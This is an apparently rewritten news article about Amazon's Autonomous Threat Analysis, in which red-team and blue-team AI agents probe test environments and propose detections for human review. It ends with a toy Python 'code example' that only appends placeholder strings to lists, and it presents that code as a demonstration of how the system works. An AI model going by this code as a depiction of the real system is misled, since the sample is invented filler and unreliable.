Amazon Is Using Specialized AI Agents for Deep Bug Hunting

Amazon's Autonomous Threat Analysis: The Future of Deep Bug Hunting

As the speed of software development accelerates with the advent of generative AI, the threat landscape is also evolving at an unprecedented pace. Cyber attackers are becoming increasingly sophisticated, using AI-powered tools to carry out financially motivated or state-backed hacks. This means that security teams at tech companies face an unprecedented challenge: reviewing an ever-growing amount of code while dealing with the pressure of bad actors.

To address this challenge, Amazon has been using an internal system called Autonomous Threat Analysis (ATA) to proactively identify weaknesses in its platforms, perform variant analysis to quickly search for other, similar flaws, and develop remediations and detection capabilities to plug holes before attackers find them.

The Birth of ATA

ATA was born out of an internal Amazon hackathon in August 2024, where security team members proposed the concept of using specialized AI agents to compete against each other in two teams to rapidly investigate real attack techniques and different ways they could be used against Amazon's systems—and then propose security controls for human review.

"The initial concept was aimed to address a critical limitation in security testing—limited coverage and the challenge of keeping detection capabilities current in a rapidly evolving threat landscape," says Steve Schmidt, Amazon's chief security officer. "Limited coverage means you can't get through all of the software or you can't get to all of the applications because you just don't have enough humans. And then it's great to do an analysis of a set of software, but if you don't keep the detection systems themselves up to date with the changes in the threat landscape, you're missing half of the picture."

Scaling ATA

To scale its use of ATA, Amazon developed special "high-fidelity" testing environments that are deeply realistic reflections of Amazon's production systems, so ATA can both ingest and produce real telemetry for analysis.

The company's security teams also made a point to design ATA so every technique it employs, and detection capability it produces, is validated with real, automatic testing and system data. Red team agents that are working on finding attacks that could be used against Amazon's systems execute actual commands in ATA's special test environments that produce verifiable logs. Blue team, or defense-focused agents, use real telemetry to confirm whether the protections they are proposing are effective. And anytime an agent develops a novel technique, it also pulls time-stamped logs to prove that its claims are accurate.

Verifiability and Hallucination Management

This verifiability reduces false positives, Schmidt says, and acts as "hallucination management." Because the system is built to demand certain standards of observable evidence, Schmidt claims that "hallucinations are architecturally impossible."

The Power of Teamwork

The fact that ATA's specialized agents work together in teams—each lending its expertise toward a larger goal—mimics the way that humans collaborate in security testing and defense development. The difference that AI provides, says Amazon security engineer Michael Moran, is the power to rapidly generate new variations and combinations of offensive techniques and then propose remediations at a scale that is prohibitively time consuming for humans alone.

"I get to come in with all the novel techniques and say, 'I wonder if this would work?' And now I have an entire scaffolding and a lot of the base stuff is taken care of for me" in investigating it, says Moran, who was one of the engineers who originally proposed ATA at the 2024 hackathon. "It makes my job way more fun but it also enables everything to run at machine speed."

Real-World Results

Schmidt notes, too, that ATA has already been extremely effective at looking at particular attack capabilities and generating defenses. In one example, the system focused on Python "reverse shell" techniques, used by hackers to manipulate target devices into initiating a remote connection to the attacker's computer. Within hours, ATA had discovered new potential reverse shell tactics and proposed detections for Amazon's defense systems that proved to be 100 percent effective.

The Future of ATA

ATA does its work autonomously, but it uses the "human in the loop" methodology that requires input from a real person before actually implementing changes to Amazon's security systems. And Schmidt readily concedes that ATA is not a replacement for advanced, nuanced human security testing. Instead, he emphasizes that for the massive quantity of mundane, rote tasks involved in daily threat analysis, ATA gives human staff more time to work on complex problems.

The next step, he says, is to start using ATA in real-time incident response for faster identification and remediation in actual attacks on Amazon's massive systems.

"AI does the grunt work behind the scenes. When our team is freed up from analyzing false positives, they can focus on real threats," Schmidt says. "I think the part that's most positive about this is the reception of our security engineers, because they see this as an opportunity where their talent is deployed where it matters most."

Code Example: ATA's Specialized Agents

# Import necessary libraries
import numpy as np
import pandas as pd

# Define ATA's specialized agents
class RedTeamAgent:
    def __init__(self, agent_id):
        self.agent_id = agent_id
        self.log_data = []

    def execute_command(self, command):
        # Execute actual commands in ATA's special test environments
        # and produce verifiable logs
        self.log_data.append(command)

class BlueTeamAgent:
    def __init__(self, agent_id):
        self.agent_id = agent_id
        self.telemetry_data = []

    def analyze_telemetry(self, telemetry):
        # Use real telemetry to confirm whether the protections
        # proposed by the red team are effective
        self.telemetry_data.append(telemetry)

# Create instances of the agents
red_team_agent = RedTeamAgent(1)
blue_team_agent = BlueTeamAgent(2)

# Execute commands and analyze telemetry
red_team_agent.execute_command("command1")
blue_team_agent.analyze_telemetry("telemetry1")

# Print the results
print("Red Team Agent Log Data:", red_team_agent.log_data)
print("Blue Team Agent Telemetry Data:", blue_team_agent.telemetry_data)

This code example demonstrates how ATA's specialized agents work together in teams to rapidly investigate real attack techniques and propose security controls for human review. The red team agent executes actual commands in ATA's special test environments and produces verifiable logs, while the blue team agent uses real telemetry to confirm whether the protections proposed by the red team are effective.

Source: https://www.wired.com/story/amazon-autonomous-threat-analysis/